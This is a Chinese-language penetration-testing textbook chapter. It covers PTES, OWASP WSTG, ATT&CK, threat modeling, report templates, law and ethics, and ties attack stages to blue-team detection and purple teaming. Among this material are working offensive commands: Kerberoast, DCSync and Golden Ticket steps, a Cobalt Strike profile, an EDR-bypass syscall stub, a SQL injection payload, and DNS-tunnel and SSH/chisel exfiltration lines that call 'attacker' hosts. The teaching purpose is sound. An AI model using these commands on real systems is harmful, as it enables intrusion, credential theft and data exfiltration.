8.3.1 PTES（Penetration Testing Execution Standard）#

7 阶段：

1
1. Pre-engagement Interactions       前期沟通
2
2. Intelligence Gathering            情报收集
3
3. Threat Modeling                   威胁建模
4
4. Vulnerability Analysis            漏洞分析
5
5. Exploitation                      漏洞利用
6
6. Post-Exploitation                 后渗透
7
7. Reporting                         报告输出

每阶段都有 可交付物（详见 §8.5）。

8.3.2 OWASP WSTG（Web Security Testing Guide）#

4.x 版本，针对 Web 应用 的标准化测试用例集合，按 11 个类别 + 编号：

1
WSTG-INFO-XX  信息收集
2
WSTG-CONF-XX  配置与部署
3
WSTG-IDNT-XX  身份管理
4
WSTG-ATHN-XX  认证
5
WSTG-ATHZ-XX  授权
6
WSTG-SESS-XX  会话管理
7
WSTG-INPV-XX  输入验证
8
WSTG-ERRH-XX  错误处理
9
WSTG-CRYP-XX  加密
10
WSTG-BUSL-XX  业务逻辑
11
WSTG-CLNT-XX  客户端
12
WSTG-API-XX   API

适合 Web 项目的渗透测试 checklist。

8.3.3 NIST SP 800-115#

美国 NIST 对信息安全测试与评估的官方指南，分四类：

• 评估 (Review)
• 识别 (Identification & Analysis)
• 验证 (Target Vulnerability Validation)
• 渗透测试 (Penetration Testing)

附录：测试技术、规划要素、报告模板。

8.3.4 OSSTMM 3.0#

ISECOM 的”开源安全测试方法手册”，6 通道：

• Human Security
• Physical Security
• Wireless Security
• Telecommunications Security
• Data Networks Security
• Compliance Security

提出RAV（Risk Assessment Value） 量化指标。

8.3.5 MITRE ATT&CK#

不是测试方法，而是攻击者 TTP 知识库。当前 14 个战术：

每个战术下数十个 Technique / Sub-technique，编号 TXXXX(.YYY)。

8.3.6 Cyber Kill Chain（Lockheed Martin）#

7 阶段（更偏宏观）：

1
Reconnaissance → Weaponization → Delivery → Exploitation
2
→ Installation → Command & Control → Actions on Objectives

适合战略叙事 / 报告写作。

8.3.7 Unified Kill Chain (Paul Pols)#

把 Cyber Kill Chain + ATT&CK + Mandiant Lifecycle 合并为 18 步链。

8.4.1 STRIDE#

1
Spoofing                  伪造身份
2
Tampering                 篡改
3
Repudiation               抵赖
4
Information Disclosure    信息泄露
5
Denial of Service         拒绝服务
6
Elevation of Privilege    权限提升

针对每个组件 / 数据流问 6 类威胁是否存在。

8.4.2 DREAD（评分）#

1
Damage           可造成损害
2
Reproducibility  可复现性
3
Exploitability   利用难度
4
Affected Users   受影响用户
5
Discoverability  可发现性

每项 1–10 分，平均得分作为优先级（已被很多团队弃用，因主观）。

8.4.3 PASTA（Process for Attack Simulation and Threat Analysis）#

7 阶段，强调与业务对齐：

1. 定义业务目标
2. 定义技术范围
3. 应用分解
4. 威胁分析
5. 漏洞分析
6. 攻击建模
7. 风险/影响分析

8.4.4 OCTAVE / OCTAVE Allegro#

CMU SEI 提出，资产驱动的风险评估方法。

8.4.5 LINDDUN（隐私威胁建模）#

1
Linkability        可关联
2
Identifiability    可识别
3
Non-repudiation    不可抵赖
4
Detectability      可检测
5
Disclosure         信息泄露
6
Unawareness        无知
7
Non-compliance     不合规

适合 GDPR / PIPL 类的隐私评估。

8.5.1 Pre-engagement Interactions（前期沟通）#

1
1. 项目名称
2
2. 客户与服务商
3
3. 范围 (Scope)：IP / URL / 应用 / 物理 / 社工
4
4. 排除项 (Out of Scope)
5
5. 时间窗
6
6. 工作量与里程碑
7
7. 交付物（报告、PoC、汇报会）
8
8. 收费模式
9
9. 责任与保险
10
10. 终止条款

1
- 测试方式：黑盒 / 灰盒 / 白盒
2
- 允许的攻击：DoS / 物理 / 社工 是否允许
3
- 测试时段：是否含周末 / 夜间
4
- 应急联系人 + 启动条件（发现实际入侵 / 数据泄露）
5
- 数据处理：测试数据保留 / 销毁
6
- 法律依据

1
本人 [姓名 + 职务]，代表 [公司名称]，授权 [乙方公司名称]
2
对以下系统在 [起始日期] 至 [结束日期] 期间进行渗透测试：
3
  - 系统列表
4
  - IP / URL
5
本测试已获得 [上级 + 法务] 批准，行使的所有测试行为视为
6
经合法授权。如执法机构问询请联系 [紧急联系人]。
7

8
签字 / 盖章 / 日期

8.5.2 Intelligence Gathering（情报收集）#

详见 Ch06。本章关注与渗透目的对齐：

• 把 OSINT 输出结构化：资产 / 人员 / 凭证 / 技术栈 / 物理位置 / 供应链
• 排序”低悬果”（low-hanging fruit）
• 设计”假设清单”：哪些攻击路径最可能成功

8.5.3 Threat Modeling（威胁建模）#

• 对场景画 STRIDE 表
• 输出”攻击假设”：例如”通过暴露的 OWA 服务 + 弱密码进入域账号”
• 可视化：用 OpenSecurityArchitecture / drawio

8.5.4 Vulnerability Analysis（漏洞分析）#

详见 Ch07。本章重点：

• 不仅要”扫到”，更要”验证”
• 自动化扫描后必须人工 triage（看输出能否复现）
• 整理候选利用链

8.5.5 Exploitation（漏洞利用）#

8.5.6 Post-Exploitation（后渗透）— ATT&CK TA0003-TA0011#

8.5.7 Reporting（报告）#

详见 §8.10 完整模板。

8.6.1 BloodHound Cypher 查询样例#

1
// 找最短路径到 Domain Admins
2
MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:'DOMAIN ADMINS@CORP.LOCAL'}))
3
RETURN p LIMIT 25
4

5
// 高价值用户 Kerberoastable
6
MATCH (u:User {hasspn: true})
7
WHERE u.enabled = true
8
RETURN u.name, u.serviceprincipalnames
9

10
// 哪些用户是 ASREPRoastable
11
MATCH (u:User {dontreqpreauth: true, enabled: true})
12
RETURN u.name
13

14
// 谁拥有 GenericAll 在域控对象上
15
MATCH (u)-[r:GenericAll]->(c:Computer {domain:'CORP.LOCAL', primarygroupid: 516})
16
RETURN u.name, type(r), c.name

8.6.2 Kerberoast PoC#

1
# 拿任意域用户即可
2
# Impacket
3
GetUserSPNs.py -request -dc-ip 10.0.0.1 CORP/alice:'Password1!'
4

5
# 离线破解
6
hashcat -m 13100 spn.hash rockyou.txt

8.6.3 DCSync PoC（Mimikatz）#

1
lsadump::dcsync /domain:corp.local /user:krbtgt

需要”Replicating Directory Changes” 权限；拿到 krbtgt hash 后即可 Golden Ticket。

8.6.4 Golden Ticket 构造#

1
kerberos::golden /user:Administrator /domain:corp.local
2
  /sid:S-1-5-21-XXX /krbtgt:<hash> /ticket:gold.kirbi /ptt

票据有效期可任意伪造（默认 10 年），不与域控验证（除非启用 KDC 验证）。

8.6.5 ADCS 利用（ESC1–ESC8）#

工具：Certify、Certipy、ADCSPwn。

8.7.1 主流 C2#

8.7.2 Beacon 流量特征#

• 默认 sleep + jitter（5s × 30%）容易被识别
• HTTP GET / POST 路径默认 __cfduid 等
• TLS 证书自签 / SAN 默认值
• JA3 指纹固定

8.7.3 Malleable C2 Profile（Cobalt Strike）#

1
http-get {
2
  set uri "/api/v2/tasks";
3
  client {
4
    header "Accept" "*/*";
5
    metadata {
6
      base64url;
7
      prepend "session=";
8
      header "Cookie";
9
    }
10
  }
11
  server {
12
    header "Content-Type" "application/json";
13
    output {
14
      base64url;
15
      print;
16
    }
17
  }
18
}

可定制看起来像 Slack / GitHub API 流量。

8.7.4 防御规避（Defense Evasion）#

• AMSI bypass（patch AmsiScanBuffer）
• ETW patching（disable Microsoft-Windows-PowerShell ETW）
• LSASS 读取规避：直接 syscall（Hells Gate / Halos Gate / Tartarus Gate）
• COM Hijacking
• 进程注入新方式：Process Hollowing / Doppelgänging / Herpaderping / Ghosting
• 利用合法签名工具 LotL（PowerShell、wmic、certutil、msbuild、bitsadmin）

8.7.5 直接 Syscall（绕 EDR Userland Hook）#

1
// Syswhispers3 / Hell's Gate 方案
2
EXTERN_C NTSTATUS NtAllocateVirtualMemory(...);
3
__asm {
4
    mov r10, rcx
5
    mov eax, 0x18           ; syscall number
6
    syscall
7
    ret
8
}

绕过 EDR 在 ntdll.dll 上的 inline hook。

8.7.6 OPSEC 原则#

• 一次行动一个化身（命名 / 时间 / 工具一致）
• 不在沙箱测试线上 payload（避免上传 VirusTotal）
• 不复用 C2 域 / 证书
• 流量分层（Beacon → Redirector → C2 server）
• 时间窗：与目标作息错开
• 数据外带前压缩 + 加密 + 限速

8.8.1 邮件钓鱼链#

1
1. 选取目标（OSINT）
2
2. 设计内容（内部题材 + 时效紧迫）
3
3. 构造发件域（仿冒 + DKIM/SPF/DMARC）
4
4. 制作有效负载（Office macro / .lnk / HTML smuggling / PDF）
5
5. 投递与跟踪（GoPhish / King Phisher）
6
6. 凭证或植入回收
7
7. 后续利用

8.8.2 工具#

• GoPhish：免费开源邮件钓鱼平台
• EvilGinx2：透明代理钓鱼，绕过 MFA（劫持 session cookie）
• Modlishka：类似 EvilGinx
• King Phisher

8.8.3 EvilGinx 关键概念#

• “Phishlet”：定义目标登录站点的代理规则
• 拿到的不是密码，而是 session cookie，可直接登录
• 完美绕过 TOTP 与短信 MFA（FIDO2 / Passkey 防御）

8.8.4 社工原则（Mitnick）#

1. 信任建立
2. 紧迫感
3. 权威效应
4. 互惠
5. 一致性偏差

防御：员工教育 + 多通道核验 + Process（不通过电话改密码）

8.8.5 物理社工#

• Tailgating（尾随进门）
• USB drop（带毒 U 盘）
• 假冒维修 / 快递 / 清洁
• RFID / HID 卡复制（Proxmark3）

8.9.1 通道#

8.9.2 常用 PoC#

1
# DNS 隧道（限速 + 分块）
2
split -b 200 secret.tar.gz part_
3
for f in part_*; do
4
  d=$(base32 < $f | tr -d '=\n' | head -c 60)
5
  dig $d.attacker.tld @attacker_dns
6
done
7

8
# HTTPS 上传（带 OPSEC headers）
9
curl -X POST -T data.zip \
10
  -H "Content-Type: application/octet-stream" \
11
  -H "User-Agent: Mozilla/5.0 ..." \
12
  https://cdn.example/upload
13

14
# 限速避免触发 NetFlow 异常
15
rclone copy --bwlimit 1M secret/ remote:bucket/

8.9.3 蓝队检测#

• Suricata / Zeek 检测异常 DNS（高熵 / 长子域 / 不在白名单）
• DLP 检测特定关键字
• DNS QPS 突变告警
• 数据出网量异常

8.10.1 结构#

1
封面（公司 LOGO + 项目名 + 版本 + 机密级别）
2
─────────────────────────────────────
3
执行摘要 (Executive Summary)
4
  - 项目目标
5
  - 关键发现 (Top 3 / 5)
6
  - 风险评级
7
  - 修复优先级与时间线建议
8

9
测试范围与方法论 (Scope & Methodology)
10
  - 范围（IP / URL / 应用）
11
  - 排除项
12
  - 时间窗
13
  - 方法论（PTES / WSTG / NIST / ATT&CK）
14

15
技术细节 (Technical Details)
16
  - 每个漏洞独立小节：
17
    1. 标题与编号
18
    2. 风险等级（Critical/High/Medium/Low）
19
    3. CVE / CWE 引用
20
    4. 描述与影响
21
    5. 复现步骤（截图 + 请求/响应 / 命令输出）
22
    6. PoC 代码 / 脚本
23
    7. 修复建议（短期 + 长期）
24
    8. 参考资料
25

26
攻击叙事 (Attack Narrative)
27
  - 时间线（Day 1 / Day 2 ...）
28
  - 关键节点 + ATT&CK Mapping
29

30
风险评估与建议 (Risk Assessment)
31
  - 短期 (≤30 天)
32
  - 中期 (≤90 天)
33
  - 长期 (>90 天)
34
  - 优先级矩阵
35

36
附录 (Appendix)
37
  - 工具与版本
38
  - 资产清单
39
  - 详细日志
40
  - 词汇表

8.10.2 漏洞描述写作要点#

• 客观：不夸大，不模糊
• 可复现：截图 + 命令 + 时间戳
• 可修复：修复建议必须具体（哪行代码 / 哪个配置）
• 风险定级：CVSS + 业务影响
• 避免技术误解：写给 CISO 也能看懂

8.10.3 中英双语示例（漏洞条目）#

1
### 5.2 SQL Injection in /api/v1/orders (id 参数)
2

3
**严重级别 / Severity**：High
4
**CWE**：CWE-89 / SQL Injection
5
**CVSS v3.1**：8.6 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
6

7
**描述 / Description**
8
The `/api/v1/orders` endpoint concatenates the `id` parameter into a SQL
9
query without parameterization, allowing UNION-based injection to read
10
arbitrary tables.
11

12
**复现 / Reproduction**
13

14
Request:

GET /api/v1/orders?id=1’ UNION SELECT 1,2,user(),version()— HTTP/1.1 Host: target.com Authorization: Bearer …

1
Response excerpt: `... "name":"root@%, 8.0.30" ...`
2

3
**影响 / Impact**
4
攻击者可读取数据库任意表，包括 `users`、`payments`，导致大规模数据泄露。
5

6
**修复 / Remediation**
7
- 短期：上线 WAF 拦截规则匹配 `'\sUNION` 等模式
8
- 中期：改用 PreparedStatement / 参数化查询
9
- 长期：在 ORM 层强制只用绑定变量
10

11
**参考 / References**
12
- OWASP Cheat Sheet: <https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html>

8.10.4 工具清单（Pandoc → PDF）#

1
pandoc report.md -o report.pdf \
2
  --template=eisvogel.latex \
3
  --toc --number-sections \
4
  -V titlepage=true -V toc-own-page=true \
5
  -V mainfont="Times New Roman" \
6
  -V CJKmainfont="Source Han Serif SC"

8.11.1 紫队的本质#

• 红 + 蓝在同一桌
• 红队执行 TTP，蓝队同时观察告警 / 响应
• 每个 TTP → 是否检测 → 是否拦截 → 修复差距
• 最终输出 ATT&CK 覆盖热力图

8.11.2 工具#

• Atomic Red Team：每个 TXXXX 一个 Atomic
• CALDERA：MITRE 出品，自动化红队
• VECTR：紫队跟踪平台
• PurpleSharp

8.11.3 持续紫队（Continuous Purple Teaming）#

• 每月跑一遍 Atomic Red Team Top 50
• 把 Sigma 规则覆盖度作为 KPI
• 与 SOC 工单系统打通：每个未检测的 TTP → 自动开 Jira

8.12.1 SolarWinds / SUNBURST（APT29）#

链路：

1. 入侵 SolarWinds 构建系统
2. 在 Orion 软件中植入 SUNBURST DLL
3. 18,000 客户更新即被感染
4. 选择性激活：检查域名 / 域控前缀
5. C2：DNS 隐藏在 avsvmcloud.com 子域

经验：

• 供应链是当前最难防御的层
• 自家 build 系统必须有完整性证明（reproducible builds）
• SBOM + Sigstore 可缓解

8.12.2 Lazarus 的 3CX 供应链#

链路：

1. 入侵 Trading Technologies
2. 投毒下游 3CX 客户端
3. 影响数千企业
4. macOS / Windows 双平台

经验：MoTW（Mark of The Web）+ 代码签名监控很关键。

8.12.3 HAFNIUM ProxyLogon#

链路：

1. CVE-2021-26855 SSRF → 拿任意 mailbox
2. CVE-2021-27065 写文件 → 部署 webshell（China Chopper）
3. 横向 → 域控

经验：暴露在公网的 Exchange / OWA 必须最快速度补丁，配合 EDR 对 webshell 检测。

8.12.4 Costa Rica Conti 勒索#

2022 年 Conti 攻击哥斯达黎加政府，几周内瘫痪国家关键服务。链路：

1. 钓鱼 → Cobalt Strike
2. 内网横向 → 部署 ESXi 加密器
3. 双重勒索（数据 + 加密）

经验：勒索 = 渗透链的”终点”，前面任何环节都是阻断窗口。

8.13.1 中国法律#

• 《刑法》第 285 条：非法侵入计算机信息系统罪
• 《网络安全法》：未经授权对关键信息基础设施测试违法
• 《数据安全法》《个人信息保护法》

8.13.2 美国 / 欧洲#

• CFAA（美国）
• GDPR / NIS2（欧盟）

8.13.3 行业认证#

• OSCP / OSEP / OSED（Offensive Security 系列）
• CEH（EC-Council）
• PNPT（TCM Security）
• CRTO / CRTL（Zero-Point Security 红队）
• CRTP / CRTE（Altered Security AD 渗透）
• CISSP / CISM（管理向）

8.13.4 道德原则#

• 仅在授权范围内行动
• 发现真实数据泄露 → 立刻停止 + 通知客户
• 不带走任何客户数据
• 报告中脱敏所有真实凭据
• 测试结束后销毁工具与中间产物

参考答案要点#

2. T1190 + WAF / Patch、T1133 + MFA、T1078 + 撞库防护、T1566 + DMARC + 人员培训、T1199 + 零信任供应链
3. PtH = NTLM hash 直接挂载；PtT = Kerberos TGT/TGS 复用；前者更通用，后者更隐蔽 + 可绕过 LM 禁用环境

教材#

• 《The Hacker Playbook 3》Peter Kim
• 《Red Team Field Manual (RTFM)》Ben Clark
• 《Blue Team Field Manual (BTFM)》Alan White
• 《Advanced Penetration Testing》Wil Allsopp
• 《The Pentester BluePrint》Phillip Wylie

标准 / 参考#

• PTES：http://www.pentest-standard.org/
• OWASP WSTG：https://owasp.org/www-project-web-security-testing-guide/
• NIST SP 800-115：https://csrc.nist.gov/publications/detail/sp/800-115/final
• MITRE ATT&CK：https://attack.mitre.org/
• HackTricks：https://book.hacktricks.xyz/
• ired.team Notes：https://www.ired.team/
• ADSecurity (Sean Metcalf)：https://adsecurity.org/
• SpecterOps Blog（BloodHound 团队）

论文 / 报告#

• M-Trends（Mandiant）年度
• Verizon DBIR
• ENISA Threat Landscape
• DFIR Report 系列：https://thedfirreport.com/

与其他章节的接口#

• ← Ch06：OSINT 输入
• ← Ch07：扫描候选漏洞
• → Ch09：二进制利用细节
• → Ch10：取证视角看红队留痕
• → Ch11：蓝队对每个战术的检测响应
• → Ch12：云 / 移动 / AI 场景的特殊路径

个人精进路径建议#

1. 基础：HTB / THM Track 走完，OSCP 过 ✅
2. AD：CRTP → CRTE → CRTL，掌握全链路
3. C2：自己写一个简易 C2（HTTP + AES 通信）→ 加 DNS / WG 通道
4. OPSEC：研究 EDR 内部，写自己的 loader / shellcode runner
5. 业务：参与公司紫队 / SRC 程序，把 ATT&CK 覆盖度做到 80%+
6. 报告：每个项目写完报告自己念三遍，能让父母听懂的才是好报告

完成本章后，你应当具备独立主导一次为期 2 周的渗透测试的能力。

实操项目建议#

• Project A（Web 应用）：搭建 OWASP Juice Shop / DVWA / WebGoat，按 OWASP WSTG 顺序覆盖 11 类用例，输出 Markdown 报告
• Project B（AD 实验室）：用 GOAD（Game of Active Directory）/ CyberMonk Lab 搭建 3 域森林，跑通 Kerberoast → DCSync → Golden Ticket 完整链路
• Project C（C2 自研）：用 Go / Rust 写一个最小 C2，含 HTTP + AES 通信、命令分发、心跳；扩展 DNS 通道
• Project D（紫队闭环）：选 5 个 Atomic Red Team 用例 → 在自己实验室运行 → 部署 Sysmon + Sigma 规则 → 验证检测覆盖度 → 写差距报告
• Project E（报告写作）：参考 OSCP 报告模板，写一份”蓄意复杂”的双语渗透报告，找朋友（非安全背景）通读，确保可读性

自检评估表#

如全部勾上”精通”，可冲击 OSEP / OSEE / CRTL 等高级认证。

学习节奏#

• 第 1–2 周：跑通 PTES 全流程，做一次 Web 项目
• 第 3–4 周：AD 实验室 + BloodHound 深入
• 第 5–6 周：C2 框架对比 + 自写 loader
• 第 7–8 周：紫队闭环 + 报告写作精修
• 持续：跟踪 ATT&CK 更新、SpecterOps / Mandiant / DFIR Report 博客

至此 Batch 2 完成；Ch09 起进入更底层的二进制 / 取证 / 蓝队 / 云移 AI 专题。

附录 A：常用 Cheat Sheet#

1
sudo -l                                  # 当前可 sudo 的命令
2
find / -perm -4000 2>/dev/null            # SUID 二进制
3
getcap -r / 2>/dev/null                   # 文件能力
4
crontab -l ; cat /etc/crontab             # 计划任务
5
ps -ef --forest | head -50                # 进程树（看 root 子进程）
6
cat /etc/passwd | grep -v nologin
7
mount | grep -E 'rw|exec'
8
uname -a ; hostnamectl ; lsb_release -a   # 内核 / 发行版
9
ss -tulpn                                 # 监听端口

1
whoami /all
2
systeminfo
3
net user /domain
4
net group "Domain Admins" /domain
5
Get-ADUser -Filter * -Properties * | Select Name,LastLogonDate
6
Get-ADGroupMember "Domain Admins"
7
Get-NetLocalGroupMember -GroupName Administrators
8
icacls "C:\Program Files\App"             # 文件权限
9
sc query state= all                       # 服务列表

1
# SSH 本地端口转发
2
ssh -L 8080:internal:80 user@jump
3

4
# SSH 反向端口转发（被攻陷主机 → 攻击者）
5
ssh -R 4444:127.0.0.1:80 attacker@vps
6

7
# SOCKS5
8
ssh -D 1080 user@jump
9
proxychains nmap -sT 10.10.10.0/24
10

11
# Chisel (HTTP/WS 隧道)
12
chisel server -p 8000 --reverse
13
chisel client http://attacker:8000 R:1080:socks

1
hashcat -m 0      hash.txt rockyou.txt    # MD5
2
hashcat -m 1000   hash.txt rockyou.txt    # NTLM
3
hashcat -m 5600   hash.txt rockyou.txt    # NetNTLMv2
4
hashcat -m 13100  hash.txt rockyou.txt    # Kerberoast
5
hashcat -m 18200  hash.txt rockyou.txt    # AS-REP Roast
6
hashcat -m 1800   hash.txt rockyou.txt    # sha512crypt
7
hashcat -m 16500  jwt.txt  rockyou.txt    # JWT HS256
8

9
# 规则
10
hashcat ... -r /usr/share/hashcat/rules/best64.rule

A.5 历史渗透链中常见 CVE#

至此本章正式完结，准备进入 Ch09。